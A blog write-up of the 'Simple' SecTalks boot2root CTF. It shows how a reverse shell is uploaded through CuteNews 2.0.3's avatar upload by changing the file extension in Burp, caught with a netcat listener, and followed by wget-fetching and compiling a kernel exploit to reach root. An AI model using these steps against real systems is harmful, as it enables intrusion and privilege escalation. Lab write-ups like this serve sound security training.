published on in writeup
tags: sectalks

BNE0x03 - Simple

Simple CTF

Simple CTF is a boot2root that focuses on the basics of web based hacking. /root/flag.txt is your ultimate goal.

Hints

  • Get a user shell by uploading a reverse shell and executing it.
  • A proxy may help you to upload the file you want, rather than the file that the server expects.
  • There are 3 known privesc exploits that work. Some people have had trouble executing one of them unless it was over a reverse shell using a netcat listener.

Discovery

[email protected]:~# nmap -n -p- -A 192.168.56.104

PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Please Login / CuteNews

Shell

CuteNews 2.0.3 has an arbitary file upload vulnerability, in the avatar function of a registered user. I first registered an account as rasta:mouse and logged in. Navigate to Personal options and select the Browse button to upload an avatar.

I copied /usr/share/webshells\php\php-reverse-shell.php to /root/rasta.jpg, and changed the IP address for the callback.

Before the upload, open burp and turn intercept on. When you upload your file, use burp to change the extension of the filename to php. So it looks something like this:

name="avatar_file"; filename="rasta.php

Once the file has been uploaded, create a netcat listener and execute your shell.

[email protected]:~# nc -lnvp 1234
listening on [any] 1234 ...

[email protected]:~# curl http://192.168.56.104/uploads/avatar_rasta_rasta.php

connect to [192.168.56.102] from (UNKNOWN) [192.168.56.104] 52214
Linux simple 3.16.0-30-generic #40~14.04.1-Ubuntu SMP Thu Jan 15 17:45:15 UTC 2015 i686 i686 i686 GNU/Linux
 08:01:39 up 37 min,  0 users,  load average: 0.00, 0.01, 0.03
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ 

Priv esc

This VM is running Ubuntu 14.04.1, which has a kernel vulnerability that will take us straight to root.

$ uname -a
Linux simple 3.16.0-30-generic #40~14.04.1-Ubuntu SMP Thu Jan 15 17:45:15 UTC 2015 i686 i686 i686 GNU/Linux

I used python -m SimpleHTTPServer on my Kali box and used wget to download the exploit source code. gcc is installed on the VM, so we can compile and run without issue.

$ wget http://192.168.56.102:8000/x.c
$ ls -l
-rw-rw-rw- 1 www-data www-data 5123 Apr 16 06:20 x.c
$ gcc x.c -o x
$ ./x
spawning threads
mount #1
mount #2
child threads done
/etc/ld.so.preload created
creating shared library
sh: 0: can't access tty; job control turned off
# whoami
root

Flag

# cat /root/flag.txt
U wyn teh Interwebs!!1eleven11!!1!
Hack the planet!